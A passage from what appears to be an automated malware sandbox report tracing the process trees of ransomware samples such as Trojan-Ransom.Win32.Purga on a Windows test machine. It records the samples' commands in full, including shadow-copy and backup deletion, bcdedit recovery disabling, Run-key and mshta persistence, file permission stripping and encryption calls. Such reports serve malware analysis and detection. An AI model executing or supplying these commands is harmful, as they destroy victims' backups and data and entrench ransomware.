                                      • C:\Windows\SysWOW64\reg.exe
                                        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v README /t REG_SZ /d "\"C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe\" \"C:\Users\Admin\AppData\Roaming\#Decrypt_Files_ReadMe#.rtf"" /f
                                        4⤵
                                        • Adds Run key to start application
                                        PID:5992
                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                        WMIC.exe shadowcopy delete /nointeractive
                                        4⤵
                                          PID:6080
                                        • C:\Windows\SysWOW64\vssadmin.exe
                                          vssadmin.exe delete shadows /all /quiet
                                          4⤵
                                          • Interacts with shadow copies
                                          PID:856
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files\VideoLAN\VLC\AUTHORS.txt" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files\VideoLAN\VLC\AUTHORS.txt"
                                        3⤵
                                          PID:3268
                                          • C:\Windows\SysWOW64\cacls.exe
                                            CACLS "C:\Program Files\VideoLAN\VLC\AUTHORS.txt" /E /G Admin:F /C
                                            4⤵
                                              PID:5364
                                            • C:\Windows\SysWOW64\attrib.exe
                                              ATTRIB -R -A -S -H "C:\Program Files\VideoLAN\VLC\AUTHORS.txt"
                                              4⤵
                                              • Views/modifies file attributes
                                              PID:3688
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files\VideoLAN\VLC\COPYING.txt" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files\VideoLAN\VLC\COPYING.txt"
                                            3⤵
                                              PID:1224
                                              • C:\Windows\SysWOW64\cacls.exe
                                                CACLS "C:\Program Files\VideoLAN\VLC\COPYING.txt" /E /G Admin:F /C
                                                4⤵
                                                  PID:3556
                                                • C:\Windows\SysWOW64\attrib.exe
                                                  ATTRIB -R -A -S -H "C:\Program Files\VideoLAN\VLC\COPYING.txt"
                                                  4⤵
                                                  • Views/modifies file attributes
                                                  PID:3864
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files\VideoLAN\VLC\lua\http\requests\README.txt" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files\VideoLAN\VLC\lua\http\requests\README.txt"
                                                3⤵
                                                  PID:1564
                                                  • C:\Windows\SysWOW64\cacls.exe
                                                    CACLS "C:\Program Files\VideoLAN\VLC\lua\http\requests\README.txt" /E /G Admin:F /C
                                                    4⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:2684
                                                  • C:\Windows\SysWOW64\attrib.exe
                                                    ATTRIB -R -A -S -H "C:\Program Files\VideoLAN\VLC\lua\http\requests\README.txt"
                                                    4⤵
                                                    • System Location Discovery: System Language Discovery
                                                    • Views/modifies file attributes
                                                    PID:2248
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files\VideoLAN\VLC\NEWS.txt" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files\VideoLAN\VLC\NEWS.txt"
                                                  3⤵
                                                    PID:5296
                                                    • C:\Windows\SysWOW64\cacls.exe
                                                      CACLS "C:\Program Files\VideoLAN\VLC\NEWS.txt" /E /G Admin:F /C
                                                      4⤵
                                                        PID:1708
                                                      • C:\Windows\SysWOW64\attrib.exe
                                                        ATTRIB -R -A -S -H "C:\Program Files\VideoLAN\VLC\NEWS.txt"
                                                        4⤵
                                                        • Views/modifies file attributes
                                                        PID:5904
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files\VideoLAN\VLC\README.txt" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files\VideoLAN\VLC\README.txt"
                                                      3⤵
                                                        PID:4520
                                                        • C:\Windows\SysWOW64\cacls.exe
                                                          CACLS "C:\Program Files\VideoLAN\VLC\README.txt" /E /G Admin:F /C
                                                          4⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:3236
                                                        • C:\Windows\SysWOW64\attrib.exe
                                                          ATTRIB -R -A -S -H "C:\Program Files\VideoLAN\VLC\README.txt"
                                                          4⤵
                                                          • Views/modifies file attributes
                                                          PID:3528
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files\VideoLAN\VLC\THANKS.txt" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files\VideoLAN\VLC\THANKS.txt"
                                                        3⤵
                                                          PID:2680
                                                          • C:\Windows\SysWOW64\cacls.exe
                                                            CACLS "C:\Program Files\VideoLAN\VLC\THANKS.txt" /E /G Admin:F /C
                                                            4⤵
                                                              PID:1872
                                                            • C:\Windows\SysWOW64\attrib.exe
                                                              ATTRIB -R -A -S -H "C:\Program Files\VideoLAN\VLC\THANKS.txt"
                                                              4⤵
                                                              • Views/modifies file attributes
                                                              PID:3368
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Optional\README.TXT" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Optional\README.TXT"
                                                            3⤵
                                                              PID:3356
                                                              • C:\Windows\SysWOW64\cacls.exe
                                                                CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Optional\README.TXT" /E /G Admin:F /C
                                                                4⤵
                                                                  PID:4824
                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                  ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Optional\README.TXT"
                                                                  4⤵
                                                                  • Views/modifies file attributes
                                                                  PID:1872
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt"
                                                                3⤵
                                                                  PID:5940
                                                                  • C:\Windows\SysWOW64\cacls.exe
                                                                    CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt" /E /G Admin:F /C
                                                                    4⤵
                                                                      PID:1256
                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                      ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt"
                                                                      4⤵
                                                                      • Views/modifies file attributes
                                                                      PID:5856
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    "C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt"
                                                                    3⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:5828
                                                                    • C:\Windows\SysWOW64\cacls.exe
                                                                      CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt" /E /G Admin:F /C
                                                                      4⤵
                                                                        PID:1664
                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                        ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt"
                                                                        4⤵
                                                                        • Views/modifies file attributes
                                                                        PID:2844
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      "C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt"
                                                                      3⤵
                                                                        PID:5628
                                                                        • C:\Windows\SysWOW64\cacls.exe
                                                                          CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt" /E /G Admin:F /C
                                                                          4⤵
                                                                            PID:2180
                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                            ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt"
                                                                            4⤵
                                                                            • Views/modifies file attributes
                                                                            PID:3120
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          "C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt"
                                                                          3⤵
                                                                            PID:5096
                                                                            • C:\Windows\SysWOW64\cacls.exe
                                                                              CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt" /E /G Admin:F /C
                                                                              4⤵
                                                                                PID:6236
                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt"
                                                                                4⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                • Views/modifies file attributes
                                                                                PID:6364
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              "C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt"
                                                                              3⤵
                                                                                PID:6412
                                                                                • C:\Windows\SysWOW64\cacls.exe
                                                                                  CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt" /E /G Admin:F /C
                                                                                  4⤵
                                                                                    PID:6096
                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                    ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt"
                                                                                    4⤵
                                                                                    • Views/modifies file attributes
                                                                                    PID:5284
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt"
                                                                                  3⤵
                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                  PID:3452
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt"
                                                                                  3⤵
                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                  PID:3544
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT"
                                                                                  3⤵
                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                  PID:5164
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT"
                                                                                  3⤵
                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                  PID:6700
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT"
                                                                                  3⤵
                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                  PID:7356
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT"
                                                                                  3⤵
                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                  PID:264
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT"
                                                                                  3⤵
                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                  PID:7400
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT"
                                                                                  3⤵
                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                  PID:7428
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT"
                                                                                  3⤵
                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                  PID:7548
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT"
                                                                                  3⤵
                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                  PID:6896
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT"
                                                                                  3⤵
                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                  PID:3924
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT"
                                                                                  3⤵
                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                  PID:5296
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT"
                                                                                  3⤵
                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                  PID:4704
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT"
                                                                                  3⤵
                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                  PID:7696
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT"
                                                                                  3⤵
                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                  PID:7744
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT"
                                                                                  3⤵
                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                  PID:7840
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT"
                                                                                  3⤵
                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                  PID:4992
                                                                              • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.PornoAsset.dfbq-29e0374a105fea9130acb3690ca69fc53e1c16cabae72013f84ba9781be9f27e.exe
                                                                                Trojan-Ransom.Win32.PornoAsset.dfbq-29e0374a105fea9130acb3690ca69fc53e1c16cabae72013f84ba9781be9f27e.exe
                                                                                2⤵
                                                                                • Executes dropped EXE
                                                                                • Loads dropped DLL
                                                                                • Adds Run key to start application
                                                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:1788
                                                                                • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                  "SCHTASKS" /Delete /tn "gxx speed launcher" /f
                                                                                  3⤵
                                                                                    PID:1944
                                                                                  • C:\Windows\SysWOW64\arp.exe
                                                                                    "arp" -a
                                                                                    3⤵
                                                                                    • Network Service Discovery
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:2304
                                                                                • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Purga.bk-89258854adce5f5fd4d99ece5aad39b306f40585810ced9b0f79dad43fd8e036.exe
                                                                                  Trojan-Ransom.Win32.Purga.bk-89258854adce5f5fd4d99ece5aad39b306f40585810ced9b0f79dad43fd8e036.exe
                                                                                  2⤵
                                                                                  • Executes dropped EXE
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                  PID:3036
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    "C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Purga.bk-89258854adce5f5fd4d99ece5aad39b306f40585810ced9b0f79dad43fd8e036.exe" "C:\Users\Admin\AppData\Roaming\database.exe"
                                                                                    3⤵
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:2448
                                                                                  • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Purga.bk-89258854adce5f5fd4d99ece5aad39b306f40585810ced9b0f79dad43fd8e036.exe
                                                                                    "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Purga.bk-89258854adce5f5fd4d99ece5aad39b306f40585810ced9b0f79dad43fd8e036.exe" runas
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    • Access Token Manipulation: Create Process with Token
                                                                                    PID:2616
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Purga.bk-89258854adce5f5fd4d99ece5aad39b306f40585810ced9b0f79dad43fd8e036.exe" "C:\Users\Admin\AppData\Roaming\database.exe"
                                                                                      4⤵
                                                                                        PID:5020
                                                                                      • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\database.exe"
                                                                                        4⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        • Suspicious behavior: GetForegroundWindowSpam
                                                                                        PID:1604
                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                          mshta.exe "javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('database.exe').Path;o.RegWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\XKOQon',i);}catch(e){}},10);"
                                                                                          5⤵
                                                                                          • Adds Run key to start application
                                                                                          • Modifies Internet Explorer settings
                                                                                          PID:5528
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0
                                                                                          5⤵
                                                                                            PID:2988
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c wmic SHADOWCOPY DELETE
                                                                                            5⤵
                                                                                              PID:3912
                                                                                              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                wmic SHADOWCOPY DELETE
                                                                                                6⤵
                                                                                                  PID:5548
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /All /Quiet
                                                                                                5⤵
                                                                                                  PID:2976
                                                                                                  • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                    vssadmin Delete Shadows /All /Quiet
                                                                                                    6⤵
                                                                                                    • Interacts with shadow copies
                                                                                                    PID:4812
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c bcdedit /set {default} recoveryenabled No
                                                                                                  5⤵
                                                                                                    PID:2316
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                                                                    5⤵
                                                                                                      PID:3716
                                                                                                    • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                      "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\!HELP_SOS.hta"
                                                                                                      5⤵
                                                                                                        PID:3164
                                                                                                      • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                        "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Data Admin.exe"
                                                                                                        5⤵
                                                                                                          PID:5036
                                                                                                        • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                          "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\desktop.ini"
                                                                                                          5⤵
                                                                                                          • Drops desktop.ini file(s)
                                                                                                          PID:1428
                                                                                                        • C:\Users\Admin\AppData\Roaming\database.exe
